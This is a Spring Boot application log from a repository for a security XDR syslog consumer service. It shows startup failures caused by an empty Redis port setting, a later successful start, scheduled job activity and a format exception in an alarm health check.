nanChen/ai-security-xdr
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
a3608952925d5000aca30bd12aaf8ab737b14799
ai-security-xdr/haobang-security-dm/logs/syslog-consumer.log
T
nanChen a360895292 1、新增功能探针联动处置、心跳在线检测 
2、syslog-consumer模块拆分 syslog-consumer-rule模块实现日志数据消费、解析、泛化入库。
2026-05-28 14:30:06 +08:00

1388 lines
190 KiB
Plaintext
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
2026-05-19 11:26:13.059 [background-preinit] INFO o.h.validator.internal.util.Version - HV000001: Hibernate Validator 6.2.5.Final
2026-05-19 11:26:13.058 [main] INFO com.syslogApplication - Starting syslogApplication using Java 1.8.0_121 on LAPTOP-ARDUR3N0 with PID 17592 (E:\GIT_GOSAME\ai-security-xdr\haobang-security-xdr\syslog-consumer\target\classes started by chenc in E:\GIT_GOSAME\ai-security-xdr\haobang-security-xdr)
2026-05-19 11:26:13.066 [main] INFO com.syslogApplication - No active profile set, falling back to 1 default profile: "default"
2026-05-19 11:26:15.578 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
2026-05-19 11:26:15.581 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Elasticsearch repositories in DEFAULT mode.
2026-05-19 11:26:16.079 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 493 ms. Found 1 Elasticsearch repository interfaces.
2026-05-19 11:26:16.084 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
2026-05-19 11:26:16.084 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Reactive Elasticsearch repositories in DEFAULT mode.
2026-05-19 11:26:16.190 [main] INFO o.s.d.r.c.RepositoryConfigurationExtensionSupport - Spring Data Reactive Elasticsearch - Could not safely identify store assignment for repository candidate interface com.common.service.AppLogRepository; If you want this repository to be a Reactive Elasticsearch repository, consider annotating your entities with one of these annotations: org.springframework.data.elasticsearch.annotations.Document (preferred), or consider extending one of the following types with your repository: org.springframework.data.elasticsearch.repository.ReactiveElasticsearchRepository
2026-05-19 11:26:16.190 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 105 ms. Found 0 Reactive Elasticsearch repository interfaces.
2026-05-19 11:26:16.204 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
2026-05-19 11:26:16.205 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Redis repositories in DEFAULT mode.
2026-05-19 11:26:16.316 [main] INFO o.s.d.r.c.RepositoryConfigurationExtensionSupport - Spring Data Redis - Could not safely identify store assignment for repository candidate interface com.common.service.AppLogRepository; If you want this repository to be a Redis repository, consider annotating your entities with one of these annotations: org.springframework.data.redis.core.RedisHash (preferred), or consider extending one of the following types with your repository: org.springframework.data.keyvalue.repository.KeyValueRepository
2026-05-19 11:26:16.317 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 105 ms. Found 0 Redis repository interfaces.
2026-05-19 11:26:16.980 [main] INFO o.s.b.w.e.tomcat.TomcatWebServer - Tomcat initialized with port(s): 8089 (http)
2026-05-19 11:26:16.988 [main] INFO o.a.coyote.http11.Http11NioProtocol - Initializing ProtocolHandler ["http-nio-8089"]
2026-05-19 11:26:16.988 [main] INFO o.a.catalina.core.StandardService - Starting service [Tomcat]
2026-05-19 11:26:16.988 [main] INFO o.a.catalina.core.StandardEngine - Starting Servlet engine: [Apache Tomcat/9.0.65]
2026-05-19 11:26:17.159 [main] INFO o.a.c.c.C.[.[.[/xdrservice] - Initializing Spring embedded WebApplicationContext
2026-05-19 11:26:17.160 [main] INFO o.s.b.w.s.c.ServletWebServerApplicationContext - Root WebApplicationContext: initialization completed in 3997 ms
2026-05-19 11:26:17.216 [main] INFO o.s.b.f.a.AutowiredAnnotationBeanPostProcessor - Autowired annotation is not supported on static fields: private static com.common.service.DmColumnService com.syslogApplication.dmColumnService
2026-05-19 11:26:19.939 [main] INFO com.influx.InfluxDBClient - InfluxDB connection successful: ready for queries and writes
2026-05-19 11:26:20.392 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.insert] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.Insert]
2026-05-19 11:26:20.404 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.update] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.Update]
2026-05-19 11:26:20.419 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.deleteById] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.DeleteById]
2026-05-19 11:26:20.421 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.selectById] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.SelectById]
2026-05-19 11:26:20.472 [main] ERROR c.b.m.core.MybatisConfiguration - mapper[com.common.mapper.SecExceptionAlgorithmMapper.findById] is ignored, because it exists, maybe from xml file
2026-05-19 11:26:24.749 [main] WARN o.s.b.w.s.c.AnnotationConfigServletWebServerApplicationContext - Exception encountered during context initialization - cancelling refresh attempt: org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'realtimeAnalysisScheduler': Unsatisfied dependency expressed through field 'ruleExecutionTimeService'; nested exception is org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'ruleExecutionTimeServiceImpl': Unsatisfied dependency expressed through field 'redisTemplate'; nested exception is org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'stringRedisTemplate' defined in class path resource [org/springframework/boot/autoconfigure/data/redis/RedisAutoConfiguration.class]: Unsatisfied dependency expressed through method 'stringRedisTemplate' parameter 0; nested exception is org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'org.springframework.boot.autoconfigure.data.redis.LettuceConnectionConfiguration': Unsatisfied dependency expressed through constructor parameter 0; nested exception is org.springframework.boot.context.properties.ConfigurationPropertiesBindException: Error creating bean with name 'spring.redis-org.springframework.boot.autoconfigure.data.redis.RedisProperties': Could not bind properties to 'RedisProperties' : prefix=spring.redis, ignoreInvalidFields=false, ignoreUnknownFields=true; nested exception is org.springframework.boot.context.properties.bind.BindException: Failed to bind properties under 'spring.redis.port' to int
2026-05-19 11:26:24.752 [main] INFO o.a.catalina.core.StandardService - Stopping service [Tomcat]
2026-05-19 11:26:24.764 [main] INFO o.s.b.a.l.ConditionEvaluationReportLoggingListener -
Error starting ApplicationContext. To display the conditions report re-run your application with 'debug' enabled.
2026-05-19 11:26:24.784 [main] ERROR o.s.b.d.LoggingFailureAnalysisReporter -
***************************
APPLICATION FAILED TO START
***************************
Description:
Failed to bind properties under 'spring.redis.port' to int:
Property: spring.redis.port
Value: ""
Origin: class path resource [application.properties] - 89:0
Reason: failed to convert java.lang.String to int (caused by java.lang.IllegalArgumentException: A null value cannot be assigned to a primitive type)
Action:
Update your application's configuration
2026-05-19 11:27:26.355 [main] INFO com.syslogApplication - Starting syslogApplication using Java 1.8.0_121 on LAPTOP-ARDUR3N0 with PID 5536 (E:\GIT_GOSAME\ai-security-xdr\haobang-security-xdr\syslog-consumer\target\classes started by chenc in E:\GIT_GOSAME\ai-security-xdr\haobang-security-xdr)
2026-05-19 11:27:26.355 [background-preinit] INFO o.h.validator.internal.util.Version - HV000001: Hibernate Validator 6.2.5.Final
2026-05-19 11:27:26.360 [main] INFO com.syslogApplication - No active profile set, falling back to 1 default profile: "default"
2026-05-19 11:27:28.429 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
2026-05-19 11:27:28.431 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Elasticsearch repositories in DEFAULT mode.
2026-05-19 11:27:28.968 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 532 ms. Found 1 Elasticsearch repository interfaces.
2026-05-19 11:27:28.973 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
2026-05-19 11:27:28.973 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Reactive Elasticsearch repositories in DEFAULT mode.
2026-05-19 11:27:29.068 [main] INFO o.s.d.r.c.RepositoryConfigurationExtensionSupport - Spring Data Reactive Elasticsearch - Could not safely identify store assignment for repository candidate interface com.common.service.AppLogRepository; If you want this repository to be a Reactive Elasticsearch repository, consider annotating your entities with one of these annotations: org.springframework.data.elasticsearch.annotations.Document (preferred), or consider extending one of the following types with your repository: org.springframework.data.elasticsearch.repository.ReactiveElasticsearchRepository
2026-05-19 11:27:29.068 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 95 ms. Found 0 Reactive Elasticsearch repository interfaces.
2026-05-19 11:27:29.080 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
2026-05-19 11:27:29.080 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Redis repositories in DEFAULT mode.
2026-05-19 11:27:29.190 [main] INFO o.s.d.r.c.RepositoryConfigurationExtensionSupport - Spring Data Redis - Could not safely identify store assignment for repository candidate interface com.common.service.AppLogRepository; If you want this repository to be a Redis repository, consider annotating your entities with one of these annotations: org.springframework.data.redis.core.RedisHash (preferred), or consider extending one of the following types with your repository: org.springframework.data.keyvalue.repository.KeyValueRepository
2026-05-19 11:27:29.192 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 104 ms. Found 0 Redis repository interfaces.
2026-05-19 11:27:29.806 [main] INFO o.s.b.w.e.tomcat.TomcatWebServer - Tomcat initialized with port(s): 8089 (http)
2026-05-19 11:27:29.814 [main] INFO o.a.coyote.http11.Http11NioProtocol - Initializing ProtocolHandler ["http-nio-8089"]
2026-05-19 11:27:29.814 [main] INFO o.a.catalina.core.StandardService - Starting service [Tomcat]
2026-05-19 11:27:29.814 [main] INFO o.a.catalina.core.StandardEngine - Starting Servlet engine: [Apache Tomcat/9.0.65]
2026-05-19 11:27:29.977 [main] INFO o.a.c.c.C.[.[.[/xdrservice] - Initializing Spring embedded WebApplicationContext
2026-05-19 11:27:29.978 [main] INFO o.s.b.w.s.c.ServletWebServerApplicationContext - Root WebApplicationContext: initialization completed in 3541 ms
2026-05-19 11:27:30.021 [main] INFO o.s.b.f.a.AutowiredAnnotationBeanPostProcessor - Autowired annotation is not supported on static fields: private static com.common.service.DmColumnService com.syslogApplication.dmColumnService
2026-05-19 11:27:32.528 [main] INFO com.influx.InfluxDBClient - InfluxDB connection successful: ready for queries and writes
2026-05-19 11:27:33.016 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.insert] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.Insert]
2026-05-19 11:27:33.028 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.update] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.Update]
2026-05-19 11:27:33.043 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.deleteById] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.DeleteById]
2026-05-19 11:27:33.045 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.selectById] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.SelectById]
2026-05-19 11:27:33.092 [main] ERROR c.b.m.core.MybatisConfiguration - mapper[com.common.mapper.SecExceptionAlgorithmMapper.findById] is ignored, because it exists, maybe from xml file
2026-05-19 11:27:37.635 [main] WARN o.s.b.w.s.c.AnnotationConfigServletWebServerApplicationContext - Exception encountered during context initialization - cancelling refresh attempt: org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'realtimeAnalysisScheduler': Unsatisfied dependency expressed through field 'ruleExecutionTimeService'; nested exception is org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'ruleExecutionTimeServiceImpl': Unsatisfied dependency expressed through field 'redisTemplate'; nested exception is org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'stringRedisTemplate' defined in class path resource [org/springframework/boot/autoconfigure/data/redis/RedisAutoConfiguration.class]: Unsatisfied dependency expressed through method 'stringRedisTemplate' parameter 0; nested exception is org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'org.springframework.boot.autoconfigure.data.redis.LettuceConnectionConfiguration': Unsatisfied dependency expressed through constructor parameter 0; nested exception is org.springframework.boot.context.properties.ConfigurationPropertiesBindException: Error creating bean with name 'spring.redis-org.springframework.boot.autoconfigure.data.redis.RedisProperties': Could not bind properties to 'RedisProperties' : prefix=spring.redis, ignoreInvalidFields=false, ignoreUnknownFields=true; nested exception is org.springframework.boot.context.properties.bind.BindException: Failed to bind properties under 'spring.redis.port' to int
2026-05-19 11:27:37.638 [main] INFO o.a.catalina.core.StandardService - Stopping service [Tomcat]
2026-05-19 11:27:37.651 [main] INFO o.s.b.a.l.ConditionEvaluationReportLoggingListener -
Error starting ApplicationContext. To display the conditions report re-run your application with 'debug' enabled.
2026-05-19 11:27:37.671 [main] ERROR o.s.b.d.LoggingFailureAnalysisReporter -
***************************
APPLICATION FAILED TO START
***************************
Description:
Failed to bind properties under 'spring.redis.port' to int:
Property: spring.redis.port
Value: ""
Origin: class path resource [application.properties] - 89:0
Reason: failed to convert java.lang.String to int (caused by java.lang.IllegalArgumentException: A null value cannot be assigned to a primitive type)
Action:
Update your application's configuration
2026-05-19 11:28:16.634 [main] INFO com.syslogApplication - Starting syslogApplication using Java 1.8.0_121 on LAPTOP-ARDUR3N0 with PID 29920 (E:\GIT_GOSAME\ai-security-xdr\haobang-security-xdr\syslog-consumer\target\classes started by chenc in E:\GIT_GOSAME\ai-security-xdr\haobang-security-xdr)
2026-05-19 11:28:16.636 [background-preinit] INFO o.h.validator.internal.util.Version - HV000001: Hibernate Validator 6.2.5.Final
2026-05-19 11:28:16.638 [main] INFO com.syslogApplication - No active profile set, falling back to 1 default profile: "default"
2026-05-19 11:28:18.835 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
2026-05-19 11:28:18.837 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Elasticsearch repositories in DEFAULT mode.
2026-05-19 11:28:19.294 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 451 ms. Found 1 Elasticsearch repository interfaces.
2026-05-19 11:28:19.299 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
2026-05-19 11:28:19.299 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Reactive Elasticsearch repositories in DEFAULT mode.
2026-05-19 11:28:19.404 [main] INFO o.s.d.r.c.RepositoryConfigurationExtensionSupport - Spring Data Reactive Elasticsearch - Could not safely identify store assignment for repository candidate interface com.common.service.AppLogRepository; If you want this repository to be a Reactive Elasticsearch repository, consider annotating your entities with one of these annotations: org.springframework.data.elasticsearch.annotations.Document (preferred), or consider extending one of the following types with your repository: org.springframework.data.elasticsearch.repository.ReactiveElasticsearchRepository
2026-05-19 11:28:19.404 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 104 ms. Found 0 Reactive Elasticsearch repository interfaces.
2026-05-19 11:28:19.415 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
2026-05-19 11:28:19.416 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Redis repositories in DEFAULT mode.
2026-05-19 11:28:19.530 [main] INFO o.s.d.r.c.RepositoryConfigurationExtensionSupport - Spring Data Redis - Could not safely identify store assignment for repository candidate interface com.common.service.AppLogRepository; If you want this repository to be a Redis repository, consider annotating your entities with one of these annotations: org.springframework.data.redis.core.RedisHash (preferred), or consider extending one of the following types with your repository: org.springframework.data.keyvalue.repository.KeyValueRepository
2026-05-19 11:28:19.530 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 106 ms. Found 0 Redis repository interfaces.
2026-05-19 11:28:20.136 [main] INFO o.s.b.w.e.tomcat.TomcatWebServer - Tomcat initialized with port(s): 8089 (http)
2026-05-19 11:28:20.144 [main] INFO o.a.coyote.http11.Http11NioProtocol - Initializing ProtocolHandler ["http-nio-8089"]
2026-05-19 11:28:20.145 [main] INFO o.a.catalina.core.StandardService - Starting service [Tomcat]
2026-05-19 11:28:20.145 [main] INFO o.a.catalina.core.StandardEngine - Starting Servlet engine: [Apache Tomcat/9.0.65]
2026-05-19 11:28:20.347 [main] INFO o.a.c.c.C.[.[.[/xdrservice] - Initializing Spring embedded WebApplicationContext
2026-05-19 11:28:20.348 [main] INFO o.s.b.w.s.c.ServletWebServerApplicationContext - Root WebApplicationContext: initialization completed in 3629 ms
2026-05-19 11:28:20.413 [main] INFO o.s.b.f.a.AutowiredAnnotationBeanPostProcessor - Autowired annotation is not supported on static fields: private static com.common.service.DmColumnService com.syslogApplication.dmColumnService
2026-05-19 11:28:23.042 [main] INFO com.influx.InfluxDBClient - InfluxDB connection successful: ready for queries and writes
2026-05-19 11:28:23.494 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.insert] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.Insert]
2026-05-19 11:28:23.505 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.update] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.Update]
2026-05-19 11:28:23.518 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.deleteById] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.DeleteById]
2026-05-19 11:28:23.522 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.selectById] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.SelectById]
2026-05-19 11:28:23.570 [main] ERROR c.b.m.core.MybatisConfiguration - mapper[com.common.mapper.SecExceptionAlgorithmMapper.findById] is ignored, because it exists, maybe from xml file
2026-05-19 11:28:29.778 [main] INFO c.c.s.RealtimeAnalysisScheduler - ========== ʼʵʱ ==========
2026-05-19 11:28:29.812 [main] INFO com.zaxxer.hikari.HikariDataSource - HikariPool-SyslogConsumer - Starting...
2026-05-19 11:28:30.487 [main] INFO com.zaxxer.hikari.HikariDataSource - HikariPool-SyslogConsumer - Start completed.
2026-05-19 11:28:30.680 [main] INFO c.c.s.RealtimeAnalysisScheduler - ѯ 1 ʵʱ
2026-05-19 11:28:36.520 [main] INFO c.c.s.i.RuleExecutionTimeServiceImpl - ʼִʱ䣬ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=--V2, windowType=tumble, nextExecuteTime=2026-05-19 11:38:00
2026-05-19 11:28:36.520 [main] INFO c.c.s.RealtimeAnalysisScheduler - ʼ: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=--V2, windowType=tumble
2026-05-19 11:28:36.520 [main] INFO c.c.s.RealtimeAnalysisScheduler - ========== ʵʱʼ ==========
2026-05-19 11:28:36.526 [main] INFO o.s.b.f.a.AutowiredAnnotationBeanPostProcessor - Autowired annotation is not supported on static fields: public static com.common.service.DeviceDeviceService com.common.service.AccessLogAlertService.deviceDeviceService
2026-05-19 11:28:36.549 [main] INFO c.c.service.AccessLogAlertService - ʼAccessLogAlertServiceϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:28:36.769 [main] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:28:37.412 [main] INFO com.influx.InfluxDBClient - InfluxDB connection successful: ready for queries and writes
2026-05-19 11:28:37.599 [main] INFO com.common.util.MyBatisUtil - MyBatis ʼɹ
2026-05-19 11:28:38.335 [main] INFO org.quartz.impl.StdSchedulerFactory - Using default implementation for ThreadExecutor
2026-05-19 11:28:38.348 [main] INFO o.quartz.core.SchedulerSignalerImpl - Initialized Scheduler Signaller of type: class org.quartz.core.SchedulerSignalerImpl
2026-05-19 11:28:38.348 [main] INFO org.quartz.core.QuartzScheduler - Quartz Scheduler v.2.3.2 created.
2026-05-19 11:28:38.349 [main] INFO org.quartz.simpl.RAMJobStore - RAMJobStore initialized.
2026-05-19 11:28:38.350 [main] INFO org.quartz.core.QuartzScheduler - Scheduler meta-data: Quartz Scheduler (v2.3.2) 'quartzScheduler' with instanceId 'NON_CLUSTERED'
Scheduler class: 'org.quartz.core.QuartzScheduler' - running locally.
NOT STARTED.
Currently in standby mode.
Number of jobs executed: 0
Using thread pool 'org.quartz.simpl.SimpleThreadPool' - with 10 threads.
Using job-store 'org.quartz.simpl.RAMJobStore' - which does not support persistence. and is not clustered.
2026-05-19 11:28:38.350 [main] INFO org.quartz.impl.StdSchedulerFactory - Quartz scheduler 'quartzScheduler' initialized from an externally provided properties instance.
2026-05-19 11:28:38.350 [main] INFO org.quartz.impl.StdSchedulerFactory - Quartz scheduler version: 2.3.2
2026-05-19 11:28:38.350 [main] INFO org.quartz.core.QuartzScheduler - JobFactory set to: org.springframework.scheduling.quartz.SpringBeanJobFactory@cee1b4c
2026-05-19 11:28:38.565 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka version: 3.4.0
2026-05-19 11:28:38.565 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka commitId: 2e1947d240607d53
2026-05-19 11:28:38.565 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka startTimeMs: 1779161318563
2026-05-19 11:28:38.595 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka version: 3.4.0
2026-05-19 11:28:38.596 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka commitId: 2e1947d240607d53
2026-05-19 11:28:38.596 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka startTimeMs: 1779161318595
2026-05-19 11:28:38.599 [main] INFO o.a.coyote.http11.Http11NioProtocol - Starting ProtocolHandler ["http-nio-8089"]
2026-05-19 11:28:38.622 [main] INFO o.s.b.w.e.tomcat.TomcatWebServer - Tomcat started on port(s): 8089 (http) with context path '/xdrservice'
2026-05-19 11:28:38.623 [main] INFO o.s.s.quartz.SchedulerFactoryBean - Starting Quartz Scheduler now
2026-05-19 11:28:38.623 [main] INFO org.quartz.core.QuartzScheduler - Scheduler quartzScheduler_$_NON_CLUSTERED started.
2026-05-19 11:28:38.644 [main] INFO com.syslogApplication - Started syslogApplication in 22.585 seconds (JVM running for 27.535)
2026-05-19 11:28:39.184 [org.springframework.kafka.KafkaListenerEndpointContainer#0-1-C-1] INFO o.s.k.l.KafkaMessageListenerContainer - test-group-app: partitions assigned: []
2026-05-19 11:28:39.221 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] INFO o.s.k.l.KafkaMessageListenerContainer - test-group-app: partitions assigned: [test-topic-0]
2026-05-19 11:28:53.756 [http-nio-8089-exec-1] INFO o.a.c.c.C.[.[.[/xdrservice] - Initializing Spring DispatcherServlet 'dispatcherServlet'
2026-05-19 11:28:53.756 [http-nio-8089-exec-1] INFO o.s.web.servlet.DispatcherServlet - Initializing Servlet 'dispatcherServlet'
2026-05-19 11:28:53.758 [http-nio-8089-exec-1] INFO o.s.web.servlet.DispatcherServlet - Completed initialization in 2 ms
2026-05-19 11:29:00.012 [scheduling-2] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:29:00.012 [log-processor-1] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:29:00.230 [log-processor-1] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:29:00.259 [scheduling-2] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:29:00.890 [log-processor-1] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:29:00.900 [scheduling-2] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:30:00.001 [scheduling-8] INFO c.c.s.ProbeStatusCheckScheduler - ========== ʼ̽״̬ ==========
2026-05-19 11:30:00.001 [scheduling-10] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:30:00.001 [scheduling-3] INFO c.c.s.AlarmHealthCheckScheduler - ========== ʼִи澯 ==========
2026-05-19 11:30:00.001 [log-processor-2] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:30:00.085 [scheduling-2] INFO c.c.service.DeviceStatsUpdateService - ʼִ豸ͳƸ...
2026-05-19 11:30:00.166 [scheduling-2] INFO c.c.service.DeviceStatsUpdateService - 豸ͳƸɣ0ʱ81ms
2026-05-19 11:30:00.167 [scheduling-2] INFO c.c.service.DeviceStatsUpdateService - ʼִɼ̽ʱ£ʱ: 2026-05-19T11:30:00.167
2026-05-19 11:30:00.172 [scheduling-2] INFO c.c.s.DeviceCollectTaskUpdateService - ʼɼʱǰʱ: 2026-05-19T11:30:00.171
2026-05-19 11:30:00.220 [scheduling-8] INFO c.c.s.ProbeStatusCheckScheduler - ̽״̬ɣ̽, ʱ: 217ms
2026-05-19 11:30:00.230 [scheduling-10] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:30:00.231 [log-processor-2] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:30:00.243 [scheduling-3] INFO c.c.service.AlarmHealthCheckService - alarm_20260519 : 4Сʱ=0, ״̬=
2026-05-19 11:30:00.246 [scheduling-3] ERROR c.c.s.AlarmHealthCheckScheduler - ִ쳣: d != java.lang.String
java.util.IllegalFormatConversionException: d != java.lang.String
at java.util.Formatter$FormatSpecifier.failConversion(Formatter.java:4302)
at java.util.Formatter$FormatSpecifier.printInteger(Formatter.java:2793)
at java.util.Formatter$FormatSpecifier.print(Formatter.java:2747)
at java.util.Formatter.format(Formatter.java:2520)
at java.util.Formatter.format(Formatter.java:2455)
at java.lang.String.format(String.java:2940)
at com.common.service.AlarmHealthCheckService.generateAlarmNotification(AlarmHealthCheckService.java:119)
at com.common.service.AlarmHealthCheckService.performHealthCheck(AlarmHealthCheckService.java:48)
at com.common.schedule.AlarmHealthCheckScheduler.scheduledHealthCheck(AlarmHealthCheckScheduler.java:32)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.springframework.scheduling.support.ScheduledMethodRunnable.run(ScheduledMethodRunnable.java:84)
at org.springframework.scheduling.support.DelegatingErrorHandlingRunnable.run(DelegatingErrorHandlingRunnable.java:54)
at org.springframework.scheduling.concurrent.ReschedulingRunnable.run(ReschedulingRunnable.java:95)
at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
at java.util.concurrent.FutureTask.run(FutureTask.java:266)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$201(ScheduledThreadPoolExecutor.java:180)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:293)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
at java.lang.Thread.run(Thread.java:745)
2026-05-19 11:30:00.246 [scheduling-3] INFO c.c.s.AlarmHealthCheckScheduler - ========== ==========
2026-05-19 11:30:00.365 [scheduling-8] INFO c.c.s.ProbeStatusCheckScheduler - ̽ͳ: =1, =1, =0
2026-05-19 11:30:00.365 [scheduling-8] INFO c.c.s.ProbeStatusCheckScheduler - ========== ̽״̬ ==========
2026-05-19 11:30:00.660 [scheduling-2] INFO c.c.s.DeviceCollectTaskUpdateService - ɣܼ: 48Ѹ: 1
2026-05-19 11:30:00.660 [scheduling-2] INFO c.c.service.DeviceStatsUpdateService - ɼ̽ʱɣʱ: 493ms
2026-05-19 11:30:00.917 [scheduling-10] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
